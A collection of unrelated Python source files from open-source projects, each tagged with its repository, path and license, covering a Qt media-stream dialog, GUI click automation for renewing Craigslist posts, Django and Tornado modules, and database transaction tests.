if style & BORDER_RIGHT:
extern_borders.append(self.line_r_actor)
else:
intern_borders.append(self.line_r_actor)
self.__set_border_colours({colour_i: intern_borders,
colour_e: extern_borders})
def SetCursor(self, cursor):
if self.cursor:
self.renderer.RemoveActor(self.cursor.actor)
self.renderer.AddActor(cursor.actor)
self.cursor = cursor
def SetNumber(self, number):
self.number = number
self.text.SetValue("%d" % self.number)
self.text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
def SetOrientation(self, orientation):
self.orientation = orientation
colour = const.ORIENTATION_COLOUR[self.orientation]
self.text.SetColour(colour)
#self.box_actor.GetProperty().SetColor(colour)
def SetSize(self, size):
w, h = size
xi = yi = 0.1
xf = w - 0.1
yf = h - 0.1
self.line_i.SetPoint1((xi, yi, 0))
self.line_i.SetPoint2((xf, yi, 0))
self.line_s.SetPoint1((xi, yf, 0))
self.line_s.SetPoint2((xf, yf, 0))
self.line_l.SetPoint1((xi, yi, 0))
self.line_l.SetPoint2((xi, yf, 0))
self.line_r.SetPoint1((xf, yi, 0))
self.line_r.SetPoint2((xf, yf, 0))
def Hide(self):
self.renderer.RemoveActor(self.actor)
self.renderer.RemoveActor(self.text.actor)
def Show(self):
self.renderer.AddActor(self.actor)
self.renderer.AddActor(self.text.actor)
| tatiana/invesalius | invesalius/data/slice_data.py | Python | gpl-2.0 | 5,655 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#######################################################################
#
# VidCutter - media cutter & joiner
#
# copyright © 2018 Pete Alexandrou
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#######################################################################
import os
import sys
from PyQt5.QtCore import pyqtSlot, Qt
from PyQt5.QtGui import QCloseEvent, QMouseEvent, QPixmap
from PyQt5.QtWidgets import (QCheckBox, QDialog, QDialogButtonBox, QFrame, QGridLayout, QGroupBox, QHBoxLayout, QLabel,
QMessageBox, QScrollArea, QSizePolicy, QSpacerItem, QStyleFactory, QVBoxLayout, QWidget)
from vidcutter.libs.iso639 import ISO639_2
from vidcutter.libs.videoservice import VideoService
class StreamSelector(QDialog):
def __init__(self, service: VideoService, parent=None, flags=Qt.Dialog | Qt.WindowCloseButtonHint):
super(StreamSelector, self).__init__(parent, flags)
self.service = service
self.parent = parent
self.streams = service.streams
self.config = service.mappings
self.setObjectName('streamselector')
self.setWindowModality(Qt.ApplicationModal)
self.setWindowTitle('Media streams - {}'.format(os.path.basename(self.parent.currentMedia)))
buttons = QDialogButtonBox(QDialogButtonBox.Ok, self)
buttons.accepted.connect(self.close)
layout = QVBoxLayout()
layout.setSpacing(15)
if len(self.streams.video):
layout.addWidget(self.video())
if len(self.streams.audio):
layout.addWidget(self.audio())
if len(self.streams.subtitle):
layout.addWidget(self.subtitles())
layout.addWidget(buttons)
self.setLayout(layout)
@staticmethod
def lineSeparator() -> QFrame:
line = QFrame()
line.setFrameShape(QFrame.HLine)
line.setFrameShadow(QFrame.Sunken)
line.setLineWidth(1)
line.setMidLineWidth(0)
line.setMinimumSize(0, 2)
return line
def video(self) -> QGroupBox:
framerate = round(eval(self.streams.video.avg_frame_rate), 3)
ratio = self.streams.video.display_aspect_ratio.split(':')
ratio = round(int(ratio[0]) / int(ratio[1]), 3)
icon = QLabel('<img src=":images/{}/streams-video.png" />'.format(self.parent.theme), self)
label = QLabel('''
<b>index:</b> {index}
<br/>
<b>codec:</b> {codec}
<br/>
<b>size:</b> {width} x {height}
<b>ratio:</b> {ratio}
<br/>
<b>frame rate:</b> {framerate} fps
<b>color format:</b> {pixfmt}'''.format(index=self.streams.video.index,
codec=self.streams.video.codec_long_name,
width=self.streams.video.width,
height=self.streams.video.height,
framerate='{0:.2f}'.format(framerate),
ratio='{0:.2f}'.format(ratio),
pixfmt=self.streams.video.pix_fmt), self)
label.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
videolayout = QHBoxLayout()
videolayout.setSpacing(15)
videolayout.addSpacing(25)
videolayout.addWidget(icon)
videolayout.addSpacing(45)
videolayout.addWidget(label)
videogroup = QGroupBox('Video')
videogroup.setLayout(videolayout)
return videogroup
def audio(self) -> QGroupBox:
audiolayout = QGridLayout()
audiolayout.setSpacing(15)
for stream in self.streams.audio:
sameplerate = round(int(stream.sample_rate) / 1000, 1)
checkbox = StreamSelectorCheckBox(stream.index, 'Toggle audio stream', self)
icon = StreamSelectorLabel('<img src=":images/{}/streams-audio.png" />'.format(self.parent.theme),
checkbox, True, self)
labeltext = '<b>index:</b> {}<br/>'.format(stream.index)
if hasattr(stream, 'tags') and hasattr(stream.tags, 'language'):
labeltext += '<b>language:</b> {}<br/>'.format(ISO639_2[stream.tags.language])
labeltext += '<b>codec:</b> {}<br/>'.format(stream.codec_long_name)
labeltext += '<b>channels:</b> {0} <b>sample rate:</b> {1:.2f} kHz' \
.format(stream.channels, sameplerate)
label = StreamSelectorLabel(labeltext, checkbox, False, self)
rows = audiolayout.rowCount()
audiolayout.addWidget(checkbox, rows, 0)
audiolayout.addItem(QSpacerItem(15, 1), rows, 1)
audiolayout.addWidget(icon, rows, 2)
audiolayout.addItem(QSpacerItem(30, 1), rows, 3)
audiolayout.addWidget(label, rows, 4)
if self.streams.audio.index(stream) < len(self.streams.audio) - 1:
audiolayout.addWidget(StreamSelector.lineSeparator(), rows + 1, 0, 1, 5)
audiolayout.setColumnStretch(4, 1)
audiogroup = QGroupBox('Audio')
if len(self.streams.audio) > 2:
audiolayout.setSizeConstraint(QGridLayout.SetMinAndMaxSize)
widget = QWidget(self)
widget.setObjectName('audiowidget')
widget.setStyleSheet('QWidget#audiowidget { background-color: transparent; }')
widget.setMinimumWidth(400)
widget.setLayout(audiolayout)
scrolllayout = QHBoxLayout()
scrolllayout.addWidget(StreamSelectorScrollArea(widget, 200, self.parent.theme, self))
audiogroup.setLayout(scrolllayout)
else:
audiogroup.setLayout(audiolayout)
return audiogroup
def subtitles(self) -> QGroupBox:
subtitlelayout = QGridLayout()
subtitlelayout.setSpacing(15)
for stream in self.streams.subtitle:
checkbox = StreamSelectorCheckBox(stream.index, 'Toggle subtitle stream', self)
icon = StreamSelectorLabel('<img src=":images/{}/streams-subtitle.png" />'.format(self.parent.theme),
checkbox, True, self)
labeltext = '<b>index:</b> {}<br/>'.format(stream.index)
if hasattr(stream, 'tags') and hasattr(stream.tags, 'language'):
labeltext += '<b>language:</b> {}<br/>'.format(ISO639_2[stream.tags.language])
labeltext += '<b>codec:</b> {}'.format(stream.codec_long_name)
label = StreamSelectorLabel(labeltext, checkbox, False, self)
rows = subtitlelayout.rowCount()
subtitlelayout.addWidget(checkbox, rows, 0)
subtitlelayout.addItem(QSpacerItem(15, 1), rows, 1)
subtitlelayout.addWidget(icon, rows, 2)
subtitlelayout.addItem(QSpacerItem(30, 1), rows, 3)
subtitlelayout.addWidget(label, rows, 4)
if self.streams.subtitle.index(stream) < len(self.streams.subtitle) - 1:
subtitlelayout.addWidget(StreamSelector.lineSeparator(), rows + 1, 0, 1, 5)
subtitlelayout.setColumnStretch(4, 1)
subtitlegroup = QGroupBox('Subtitles')
if len(self.streams.subtitle) > 2:
subtitlelayout.setSizeConstraint(QVBoxLayout.SetMinAndMaxSize)
widget = QWidget(self)
widget.setObjectName('subtitlewidget')
widget.setStyleSheet('QWidget#subtitlewidget { background-color: transparent; }')
widget.setMinimumWidth(400)
widget.setLayout(subtitlelayout)
scrolllayout = QHBoxLayout()
scrolllayout.addWidget(StreamSelectorScrollArea(widget, 170, self.parent.theme, self))
subtitlegroup.setStyleSheet('QGroupBox { padding-right: 0; }')
subtitlegroup.setLayout(scrolllayout)
else:
subtitlegroup.setLayout(subtitlelayout)
return subtitlegroup
@pyqtSlot()
def closeEvent(self, event: QCloseEvent) -> None:
# check if all audio streams are off
idx = [stream.index for stream in self.streams.audio]
no_audio = len(self.streams.audio) and True not in [self.config[i] for i in idx]
# check if all subtitle streams are off
idx = [stream.index for stream in self.streams.subtitle]
no_subtitles = len(self.streams.subtitle) and True not in [self.config[i] for i in idx]
# warn user if all audio and/or subtitle streams are off
if no_audio or no_subtitles:
if no_audio and not no_subtitles:
warnsubtext = 'All audio streams have been deselected which will produce a file with <b>NO AUDIO</b> ' \
'when you save.'
elif not no_audio and no_subtitles:
warnsubtext = 'All subtitle streams have been deselected which will produce a file with ' \
'<b>NO SUBTITLES</b> when you save.'
else:
warnsubtext = 'All audio and subtitle streams have been deselected which will produce a file ' \
'with <b>NO AUDIO</b> and <b>NO SUBTITLES</b> when you save.'
warntext = '''
<style>
h2 {{
color: {};
font-family: "Futura LT", sans-serif;
font-weight: normal;
}}
</style>
<table border="0" cellpadding="6" cellspacing="0" width="350">
<tr>
<td><h2>A friendly configuration warning</h2></td>
</tr>
<tr>
<td>{}</td>
</tr>
<tr>
<td>Are you sure this is what you want?</td>
</tr>
</table>'''.format('#C681D5' if self.parent.theme == 'dark' else '#642C68', warnsubtext)
warnmsg = QMessageBox(QMessageBox.Warning, 'Warning', warntext, parent=self)
warnmsg.setIconPixmap(QPixmap(':images/warning.png'))
warnmsg.addButton('Yes', QMessageBox.YesRole)
cancelbtn = warnmsg.addButton('No', QMessageBox.RejectRole)
warnmsg.exec_()
res = warnmsg.clickedButton()
if res == cancelbtn:
event.ignore()
return
event.accept()
self.deleteLater()
super(StreamSelector, self).closeEvent(event)
class StreamSelectorScrollArea(QScrollArea):
def __init__(self, widget: QWidget, minHeight: int, theme: str, parent):
super(StreamSelectorScrollArea, self).__init__(parent)
if sys.platform in {'win32', 'darwin'}:
self.setStyle(QStyleFactory.create('Fusion'))
# noinspection PyUnresolvedReferences
if parent.parent.parent.stylename == 'fusion' or sys.platform in {'win32', 'darwin'}:
self.setStyleSheet('''
QScrollArea {{
background-color: transparent;
margin-bottom: 10px;
border: none;
border-right: 1px solid {};
}}'''.format('#4D5355' if theme == 'dark' else '#C0C2C3'))
else:
self.setStyleSheet('''
QScrollArea {{
background-color: transparent;
margin-bottom: 10px;
border: none;
}}''')
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setFrameShape(QFrame.NoFrame)
self.setMinimumHeight(minHeight)
if widget is not None:
self.setWidget(widget)
class StreamSelectorCheckBox(QCheckBox):
def __init__(self, stream_index: int, tooltip: str, parent):
super(StreamSelectorCheckBox, self).__init__(parent)
self.parent = parent
self.setObjectName('streamcheckbox')
self.setCursor(Qt.PointingHandCursor)
self.setToolTip(tooltip)
self.setChecked(self.parent.config[stream_index])
self.stateChanged.connect(lambda state, index=stream_index: self.updateConfig(index, state == Qt.Checked))
def updateConfig(self, index: int, checked: bool) -> None:
self.parent.config[index] = checked
class StreamSelectorLabel(QLabel):
def __init__(self, text: str, checkbox: StreamSelectorCheckBox, is_icon: bool=False, parent=None):
super(StreamSelectorLabel, self).__init__(parent)
self.checkbox = checkbox
self.setAttribute(Qt.WA_Hover, True)
self.setText(text)
self.setToolTip(self.checkbox.toolTip())
self.setCursor(Qt.PointingHandCursor)
if is_icon:
self.setFixedSize(18, 18)
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
else:
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)
def mousePressEvent(self, event: QMouseEvent) -> None:
if event.button() == Qt.LeftButton and self.checkbox is not None:
self.checkbox.toggle()
super(StreamSelectorLabel, self).mousePressEvent(event)
| ozmartian/vidcutter | vidcutter/mediastream.py | Python | gpl-3.0 | 13,866 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, division, absolute_import, unicode_literals
| mick-d/nipype | nipype/sphinxext/__init__.py | Python | bsd-3-clause | 243 |
import unittest
def main():
loader = unittest.TestLoader()
suite = loader.discover('.', pattern='*.py')
unittest.TextTestRunner().run(suite)
if __name__ == "__main__":
main()
| uozuAho/doit_helpers | test/run_all_tests.py | Python | mit | 195 |
#!/usr/bin/python
# Welcome to CLRenew, a simple python script that automates mouse clicks to
# renew craigslist postings credit to https://github.com/yuqianli for base code
import pyautogui
import os
# Set a counter to count the # of exceptions occur
counter = 0
# Start the while loop
while True:
try:
print ("Be sure your active listings page is up and active")
pyautogui.time.sleep(2)
renewButtonLocationX, renewButtonLocationY = pyautogui.locateCenterOnScreen('renew.png')
pyautogui.moveTo(renewButtonLocationX, renewButtonLocationY)
pyautogui.click()
pyautogui.time.sleep(2)
# This part of the loop will depend on your browser binding to go back a page:
pyautogui.keyDown('alt')
pyautogui.press('left')
pyautogui.keyUp('alt')
pyautogui.time.sleep(2)
# Exception handle when pyautogui can't locate the renew button on the screen
# or if it clicks away by mistake
# this section needs work and sometimes fails to function properly
except Exception:
print ("Exception thrown, calculating course of action")
pyautogui.press('pgdn')
counter += 1
print ("counter =" + str(counter))
if counter >= 3: counter = 0
pyautogui.time.sleep(2)
renewButtonLocationX,renewButtonLocationY = pyautogui.locateCenterOnScreen('page2.png')
pyautogui.moveTo(renewButtonLocationX, renewButtonLocationY)
pyautogui.click()
pyautogui.time.sleep(2)
| calexil/CLRenew | renew.py | Python | gpl-3.0 | 1,501 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of importer.
# https://github.com/heynemann/importer
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Bernardo Heynemann <[email protected]>
from setuptools import setup, find_packages
from importer import __version__
tests_require = [
'mock',
'nose',
'coverage',
'yanc',
'preggy',
'tox',
'ipdb',
'coveralls',
'sphinx',
]
setup(
name='importer-lib',
version=__version__,
description='Importer is a library to do dynamic importing of modules in python Edit',
long_description='''
Importer is a library to do dynamic importing of modules in python Edit
''',
keywords='importer dynamic loading modules',
author='Bernardo Heynemann',
author_email='[email protected]',
url='https://github.com/heynemann/importer',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: Unix',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
'Operating System :: OS Independent',
],
packages=find_packages(),
include_package_data=False,
install_requires=[
# add your dependencies here
# remember to use 'package-name>=x.y.z,<x.(y+1).0' notation
# (this way you get bugfixes but no breaking changes)
],
extras_require={
'tests': tests_require,
},
entry_points={
'console_scripts': [
# add cli scripts here in this form:
# 'importer=importer.cli:main',
],
},
)
| heynemann/importer | setup.py | Python | mit | 1,854 |
#!/usr/bin/python
import os, string, sys
lib_path = os.path.abspath('./TL/')
sys.path.append(lib_path)
from data_handling import load_savedgzdata
basepath_15000 = sys.argv[1]
resolution_15000 = '15000'
basepath_50000 = sys.argv[2]
for nrun in range(1,21):
pathids0 = '{0:s}/{1:05d}_{2:05d}_test_ids.pkl.gz'.format(basepath_15000,nrun,string.atoi(resolution_15000))
pathids1 = '{0:s}/{1:05d}_{2:05d}_test_ids.pkl.gz'.format(basepath_50000,nrun,string.atoi(resolution_15000))
print >> sys.stderr, 'Loading ' + pathids0 + '...'
ids0 = load_savedgzdata(pathids0)
print >> sys.stderr, 'Loading ' + pathids1 + '...'
ids1 = load_savedgzdata(pathids1)
print >> sys.stderr, ids0
print >> sys.stderr, ids1
#raw_input()
| rjgsousa/TEM | sda_log_evaluation/check_ids.py | Python | gpl-3.0 | 754 |
#!/usr/bin/env python
import json
inv = {
'_meta': {
'hostvars': {}
},
'hosts': []
}
for num in range(0, 3):
host = u"host-%0.2d" % num
inv['hosts'].append(host)
inv['_meta']['hostvars'][host] = dict(ansible_ssh_host='127.0.0.1', ansible_connection='local')
print(json.dumps(inv, indent=2))
| ansible/tower-cli | docs/source/cli_ref/examples/inventory_script_example.py | Python | apache-2.0 | 327 |
from modules.chart_module import ChartModule
import tornado.web
import logging
class LineChartModule(ChartModule):
def render(self, raw_data, keys, chart_id="linechart"):
self.chart_id = chart_id
self.chart_data = self.overtime_linechart_data(raw_data, keys)
return self.render_string('modules/linechart.html', chart_id=self.chart_id)
def overtime_linechart_data(self, raw_data, keys,
yearterms_key='fcqs_yearterms',
overtime_key='fcqs_overtime'):
def _overtime_builder(overtime_data, key):
def _transform_overtime_data(yearterm):
value = overtime_data[str(yearterm)][key]
roundto = {
'percent_a': 3,
'percent_b': 3,
'percent_c': 3,
'percent_d': 3,
'percent_f': 3,
'percent_incomplete': 3,
'average_grade': 3
}.get(key, 1)
if value is not None:
return round(value, roundto)
else:
return None
return _transform_overtime_data
def _overtime_dataset_builder(key):
color = {
'course_howmuchlearned_average': (247, 92, 3),
'course_challenge_average': (217, 3, 104),
'courseoverall_average': (130, 2, 99),
'course_priorinterest_average': (4, 167, 119),
'instructor_effectiveness_average': (247, 92, 3),
'instructor_respect_average': (217, 3, 104),
'instructoroverall_average': (130, 2, 99),
'instructor_availability_average': (4, 167, 119),
'TTT_instructoroverall_average': (197, 27, 125),
'OTH_instructoroverall_average': (233, 163, 201),
'TA_instructoroverall_average': (253, 224, 239),
'GR_courseoverall_average': (77, 146, 33),
'UD_courseoverall_average': (161, 215, 106),
'LD_courseoverall_average': (230, 245, 106),
'percent_a': (44, 123, 182),
'percent_b': (171, 217, 233),
'percent_c': (255, 255, 191),
'percent_d': (253, 174, 97),
'percent_f': (215, 25, 28),
'percent_incomplete': (48, 48, 48),
'average_grade': (48, 48, 48),
}.get(key, (48, 48, 48))
yaxis_id = {
'percent_a': 'y-axis-3',
'percent_b': 'y-axis-3',
'percent_c': 'y-axis-3',
'percent_d': 'y-axis-3',
'percent_f': 'y-axis-3',
'percent_incomplete': 'y-axis-3',
'average_grade': 'y-axis-2',
}.get(key, 'y-axis-1')
fill = {
'percent_a': True,
'percent_b': True,
'percent_c': True,
'percent_d': True,
'percent_f': True,
'percent_incomplete': True,
}.get(key, False)
label = {
'course_howmuchlearned_average': 'Amount Learned',
'course_challenge_average': 'Challenge',
'courseoverall_average': 'Course Overall',
'course_priorinterest_average': 'Prior Interest',
'instructor_effectiveness_average': 'Effectiveness',
'instructor_respect_average': 'Respect',
'instructoroverall_average': 'Instructor Overall',
'instructor_availability_average': 'Availability',
'TTT_instructoroverall_average': 'TTT instructors',
'OTH_instructoroverall_average': 'OTH instructors',
'TA_instructoroverall_average': 'TA instructors',
'GR_courseoverall_average': 'GR Course Overall',
'UD_courseoverall_average': 'UD Course Overall',
'LD_courseoverall_average': 'LD Course Overall',
'percent_a': 'A Grade',
'percent_b': 'B Grade',
'percent_c': 'C Grade',
'percent_d': 'D Grade',
'percent_f': 'F Grade',
'percent_incomplete': 'Incomplete',
'average_grade': 'Average GPA'
}.get(key, '???')
background_alpha = 1.0 if fill else 0.2
return {
'label': label,
'fill': fill,
'yAxisID': yaxis_id,
'backgroundColor': "rgba({0},{1},{2},{background_alpha})".format(*color, background_alpha=background_alpha),
'borderColor': "rgba({0},{1},{2},1)".format(*color),
'pointBackgroundColor': "rgba({0},{1},{2},1)".format(*color),
'pointHoverBackgroundColor': "rgba({0},{1},{2},1)".format(*color),
'pointHoverBorderColor': "#fff",
'pointHoverBorderWidth': 2,
'pointHoverRadius': 5,
'data': list(map(_overtime_builder(overtime_data, key), yearterms))
}
yearterms = raw_data[yearterms_key]
overtime_data = raw_data[overtime_key]
labels = list(map(self.convert_date, yearterms))
datasets = list(map(_overtime_dataset_builder, keys))
return tornado.escape.json_encode({
'labels': labels,
'datasets': datasets,
})
def embedded_javascript(self):
options = tornado.escape.json_encode(self.chart_options())
foo = '''
new Chart(document.getElementById("{2}").getContext("2d"),{{
type:'line',
data:{1},
options:{0}
}});
'''.format(options, self.chart_data, self.chart_id)
return foo
| SFII/cufcq-new | modules/linechart_module.py | Python | mit | 5,898 |
#!/usr/bin/env python
import confy
import os
import sys
# These lines are required for interoperability between local and container environments.
dot_env = os.path.join(os.getcwd(), '.env')
if os.path.exists(dot_env):
confy.read_environment_file()
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "oim_cms.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| scottp-dpaw/oim-cms | manage.py | Python | apache-2.0 | 1,015 |
#
# Solution to Project Euler problem 73
# Philippe Legault
#
# https://github.com/Bathlamos/Project-Euler-Solutions
from fractions import Fraction, gcd
from math import ceil
# Not too slow, can be done directly
def compute():
lower_limit = Fraction(1, 3)
upper_limit = Fraction(1, 2)
res = 0
for i in range(1, 12000 + 1):
for j in range(int(ceil(lower_limit * i + 0.00001)), int(upper_limit * i - 0.00001) + 1):
if gcd(i, j) == 1:
res += 1
return res
if __name__ == "__main__":
print(compute()) | Bathlamos/Project-Euler-Solutions | solutions/p073.py | Python | mit | 520 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0008_auto_20160304_1108'),
]
operations = [
migrations.AlterField(
model_name='room',
name='text_coords',
field=models.CommaSeparatedIntegerField(help_text='Area where the label should be displayed (defaults to room coordinates)<br>Please use the following format: <em>x1,y1,x2,y2</em>. <b>Rectangle only!</b>', max_length=50, null=True, verbose_name='Text area coordinates', blank=True),
),
]
| CentechMTL/TableauDeBord | app/home/migrations/0009_auto_20160304_1126.py | Python | gpl-3.0 | 646 |
#
# Copyright (C) 2006-2016 Nexedi SA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from mock import Mock
from struct import pack
from .. import NeoUnitTestBase
from neo.lib.protocol import NodeTypes
from neo.lib.util import packTID, unpackTID, addTID
from neo.master.transactions import Transaction, TransactionManager
class testTransactionManager(NeoUnitTestBase):
def makeTID(self, i):
return pack('!Q', i)
def makeOID(self, i):
return pack('!Q', i)
def makeNode(self, node_type):
uuid = self.getNewUUID(node_type)
node = Mock({'getUUID': uuid, '__hash__': uuid, '__repr__': 'FakeNode'})
return uuid, node
def testTransaction(self):
# test data
node = Mock({'__repr__': 'Node'})
tid = self.makeTID(1)
ttid = self.makeTID(2)
oid_list = (oid1, oid2) = [self.makeOID(1), self.makeOID(2)]
uuid_list = (uuid1, uuid2) = [self.getStorageUUID(),
self.getStorageUUID()]
msg_id = 1
# create transaction object
txn = Transaction(node, ttid)
txn.prepare(tid, oid_list, uuid_list, msg_id)
self.assertEqual(txn.getUUIDList(), uuid_list)
self.assertEqual(txn.getOIDList(), oid_list)
# lock nodes one by one
self.assertFalse(txn.lock(uuid1))
self.assertTrue(txn.lock(uuid2))
# check that repr() works
repr(txn)
def testManager(self):
# test data
node = Mock({'__hash__': 1})
msg_id = 1
oid_list = (oid1, oid2) = self.makeOID(1), self.makeOID(2)
uuid_list = uuid1, uuid2 = self.getStorageUUID(), self.getStorageUUID()
client_uuid = self.getClientUUID()
# create transaction manager
callback = Mock()
txnman = TransactionManager(on_commit=callback)
self.assertFalse(txnman.hasPending())
self.assertEqual(txnman.registerForNotification(uuid1), [])
# begin the transaction
ttid = txnman.begin(node)
self.assertTrue(ttid is not None)
self.assertEqual(len(txnman.registerForNotification(uuid1)), 1)
self.assertTrue(txnman.hasPending())
# prepare the transaction
tid = txnman.prepare(ttid, 1, oid_list, uuid_list, msg_id)
self.assertTrue(txnman.hasPending())
self.assertEqual(txnman.registerForNotification(uuid1), [ttid])
txn = txnman[ttid]
self.assertEqual(txn.getTID(), tid)
self.assertEqual(txn.getUUIDList(), list(uuid_list))
self.assertEqual(txn.getOIDList(), list(oid_list))
# lock nodes
txnman.lock(ttid, uuid1)
self.assertEqual(len(callback.getNamedCalls('__call__')), 0)
txnman.lock(ttid, uuid2)
self.assertEqual(len(callback.getNamedCalls('__call__')), 1)
self.assertEqual(txnman.registerForNotification(uuid1), [])
def test_storageLost(self):
client1 = Mock({'__hash__': 1})
client2 = Mock({'__hash__': 2})
client3 = Mock({'__hash__': 3})
storage_1_uuid = self.getStorageUUID()
storage_2_uuid = self.getStorageUUID()
oid_list = [self.makeOID(1), ]
tm = TransactionManager(lambda tid, txn: None)
# Transaction 1: 2 storage nodes involved, one will die and the other
# already answered node lock
msg_id_1 = 1
ttid1 = tm.begin(client1)
tid1 = tm.prepare(ttid1, 1, oid_list,
[storage_1_uuid, storage_2_uuid], msg_id_1)
tm.lock(ttid1, storage_2_uuid)
t1 = tm[ttid1]
self.assertFalse(t1.locked())
# Storage 1 dies:
# t1 is over
self.assertTrue(t1.storageLost(storage_1_uuid))
self.assertEqual(t1.getUUIDList(), [storage_2_uuid])
del tm[ttid1]
# Transaction 2: 2 storage nodes involved, one will die
msg_id_2 = 2
ttid2 = tm.begin(client2)
tid2 = tm.prepare(ttid2, 1, oid_list,
[storage_1_uuid, storage_2_uuid], msg_id_2)
t2 = tm[ttid2]
self.assertFalse(t2.locked())
# Storage 1 dies:
# t2 still waits for storage 2
self.assertFalse(t2.storageLost(storage_1_uuid))
self.assertEqual(t2.getUUIDList(), [storage_2_uuid])
self.assertTrue(t2.lock(storage_2_uuid))
del tm[ttid2]
# Transaction 3: 1 storage node involved, which won't die
msg_id_3 = 3
ttid3 = tm.begin(client3)
tid3 = tm.prepare(ttid3, 1, oid_list, [storage_2_uuid, ],
msg_id_3)
t3 = tm[ttid3]
self.assertFalse(t3.locked())
# Storage 1 dies:
# t3 doesn't care
self.assertFalse(t3.storageLost(storage_1_uuid))
self.assertEqual(t3.getUUIDList(), [storage_2_uuid])
self.assertTrue(t3.lock(storage_2_uuid))
del tm[ttid3]
def testTIDUtils(self):
"""
Tests packTID/unpackTID/addTID.
"""
min_tid = pack('!LL', 0, 0)
min_unpacked_tid = ((1900, 1, 1, 0, 0), 0)
max_tid = pack('!LL', 2**32 - 1, 2 ** 32 - 1)
# ((((9917 - 1900) * 12 + (10 - 1)) * 31 + (14 - 1)) * 24 + 4) * 60 +
# 15 == 2**32 - 1
max_unpacked_tid = ((9917, 10, 14, 4, 15), 2**32 - 1)
self.assertEqual(unpackTID(min_tid), min_unpacked_tid)
self.assertEqual(unpackTID(max_tid), max_unpacked_tid)
self.assertEqual(packTID(*min_unpacked_tid), min_tid)
self.assertEqual(packTID(*max_unpacked_tid), max_tid)
self.assertEqual(addTID(min_tid, 1), pack('!LL', 0, 1))
self.assertEqual(addTID(pack('!LL', 0, 2**32 - 1), 1),
pack('!LL', 1, 0))
self.assertEqual(addTID(pack('!LL', 0, 2**32 - 1), 2**32 + 1),
pack('!LL', 2, 0))
# Check impossible dates are avoided (2010/11/31 doesn't exist)
self.assertEqual(
unpackTID(addTID(packTID((2010, 11, 30, 23, 59), 2**32 - 1), 1)),
((2010, 12, 1, 0, 0), 0))
def testTransactionLock(self):
"""
Transaction lock is present to ensure invalidation TIDs are sent in
strictly increasing order.
Note: this implementation might change later, to allow more paralelism.
"""
client_uuid, client = self.makeNode(NodeTypes.CLIENT)
tm = TransactionManager(lambda tid, txn: None)
# With a requested TID, lock spans from begin to remove
ttid1 = self.getNextTID()
ttid2 = self.getNextTID()
tid1 = tm.begin(client, ttid1)
self.assertEqual(tid1, ttid1)
del tm[ttid1]
# Without a requested TID, lock spans from prepare to remove only
ttid3 = tm.begin(client)
ttid4 = tm.begin(client) # Doesn't raise
node = Mock({'getUUID': client_uuid, '__hash__': 0})
tid4 = tm.prepare(ttid4, 1, [], [], 0)
del tm[ttid4]
tm.prepare(ttid3, 1, [], [], 0)
def testClientDisconectsAfterBegin(self):
client_uuid1, node1 = self.makeNode(NodeTypes.CLIENT)
tm = TransactionManager(lambda tid, txn: None)
tid1 = self.getNextTID()
tid2 = self.getNextTID()
tm.begin(node1, tid1)
tm.clientLost(node1)
self.assertTrue(tid1 not in tm)
def testUnlockPending(self):
callback = Mock()
uuid1, node1 = self.makeNode(NodeTypes.CLIENT)
uuid2, node2 = self.makeNode(NodeTypes.CLIENT)
storage_uuid = self.getStorageUUID()
tm = TransactionManager(callback)
ttid1 = tm.begin(node1)
ttid2 = tm.begin(node2)
tid1 = tm.prepare(ttid1, 1, [], [storage_uuid], 0)
tid2 = tm.prepare(ttid2, 1, [], [storage_uuid], 0)
tm.lock(ttid2, storage_uuid)
# txn 2 is still blocked by txn 1
self.assertEqual(len(callback.getNamedCalls('__call__')), 0)
tm.lock(ttid1, storage_uuid)
# both transactions are unlocked when txn 1 is fully locked
self.assertEqual(len(callback.getNamedCalls('__call__')), 2)
if __name__ == '__main__':
unittest.main()
| vpelletier/neoppod | neo/tests/master/testTransactions.py | Python | gpl-2.0 | 8,633 |
#!/usr/bin/env python
# Copyright 2014-2019 Thomas Schatz, Mathieu Bernard, Roland Thiolliere
#
# This file is part of h5features.
#
# h5features is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# h5features is distributed in the hope that it will be useful,
